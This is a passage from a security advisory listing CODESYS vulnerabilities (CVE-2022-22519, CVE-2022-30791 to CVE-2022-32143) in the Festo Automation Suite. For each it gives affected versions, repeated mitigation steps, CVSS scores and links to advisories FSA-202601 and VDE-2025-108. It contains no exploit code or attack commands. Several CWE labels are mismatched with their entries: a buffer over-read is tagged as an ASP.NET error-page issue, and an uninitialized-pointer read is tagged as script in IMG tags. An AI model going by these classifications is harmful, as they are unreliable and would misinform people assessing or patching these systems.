(3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-33 Path Traversal: '....' (Multiple Dot) Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H CVE-2022-22519 A remote, unauthenticated attacker can send a specific crafted HTTP or HTTPS requests causing a buffer over-read resulting in a crash of the webserver of the CODESYS Control runtime system. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-12 ASP.NET Misconfiguration: Missing Custom Error Page Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H CVE-2022-30791 In CmpBlkDrvTcp of CODESYS V3 in multiple versions an uncontrolled ressource consumption allows an unauthorized attacker to block new TCP connections. Existing connections are not affected. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-400 Uncontrolled Resource Consumption Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H CVE-2022-30792 In CmpChannelServer of CODESYS V3 in multiple versions an uncontrolled ressource consumption allows an unauthorized attacker to block new communication channel connections. Existing connections are not affected. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-400 Uncontrolled Resource Consumption Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H CVE-2022-31805 In the CODESYS Development System multiple components in multiple versions transmit the passwords for the communication between clients and servers unprotected. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-523 Unprotected Transport of Credentials Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N CVE-2022-31806 In CODESYS V2 PLCWinNT and Runtime Toolkit 32 in versions prior to V2.4.7.57 password protection is not enabled by default and there is no information or prompt to enable password protection at login in case no password is set at the controller. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-1188 Initialization of a Resource with an Insecure Default Metrics CVSS Version Base Score Base Severity Vector String 3.1 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H CVE-2022-32136 In multiple CODESYS products, a low privileged remote attacker may craft a request that cause a read access to an uninitialized pointer, resulting in a denial-of-service. User interaction is not required. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-82 Improper Neutralization of Script in Attributes of IMG Tags in a Web Page Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2022-32137 In multiple CODESYS products, a low privileged remote attacker may craft a request, which may cause a heap-based buffer overflow, resulting in a denial-of-service condition or memory overwrite. User interaction is not required. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-122 Heap-based Buffer Overflow Metrics CVSS Version Base Score Base Severity Vector String 3.1 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2022-32138 In multiple CODESYS products, a remote attacker may craft a request which may cause an unexpected sign extension, resulting in a denial-of-service condition or memory overwrite. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-194 Unexpected Sign Extension Metrics CVSS Version Base Score Base Severity Vector String 3.1 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2022-32139 In multiple CODESYS products, a low privileged remote attacker may craft a request, which cause an out-of-bounds read, resulting in a denial-of-service condition. User Interaction is not required. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-125 Out-of-bounds Read Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2022-32140 Multiple CODESYS products are affected to a buffer overflow.A low privileged remote attacker may craft a request, which can cause a buffer copy without checking the size of the service, resulting in a denial-of-service condition. User Interaction is not required. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-120 Buffer Copy without Checking Size of Input ('Classic Buffer Overflow') Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2022-32141 Multiple CODESYS Products are prone to a buffer over read. A low privileged remote attacker may craft a request with an invalid offset, which can cause an internal buffer over-read, resulting in a denial-of-service condition. User interaction is not required. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-126 Buffer Over-read Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2022-32142 Multiple CODESYS Products are prone to a out-of bounds read or write access. A low privileged remote attacker may craft a request with invalid offset, which can cause an out-of-bounds read or write access, resulting in denial-of-service condition or local memory overwrite, which can lead to a change of local files. User interaction is not required. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-823 Use of Out-of-range Pointer Offset Metrics CVSS Version Base Score Base Severity Vector String 3.0 8.1 HIGH CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H CVE-2022-32143 In multiple CODESYS products, file download and upload function allows access to internal files in the working directory e.g. firmware files of the PLC. All requests are processed on the controller only if no level 1 password is configured on the controller or if remote attacker has previously successfully authenticated himself to the controller. A successful Attack may lead to a denial of service, change of local files, or drain of confidential Information. User interaction is not required View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. 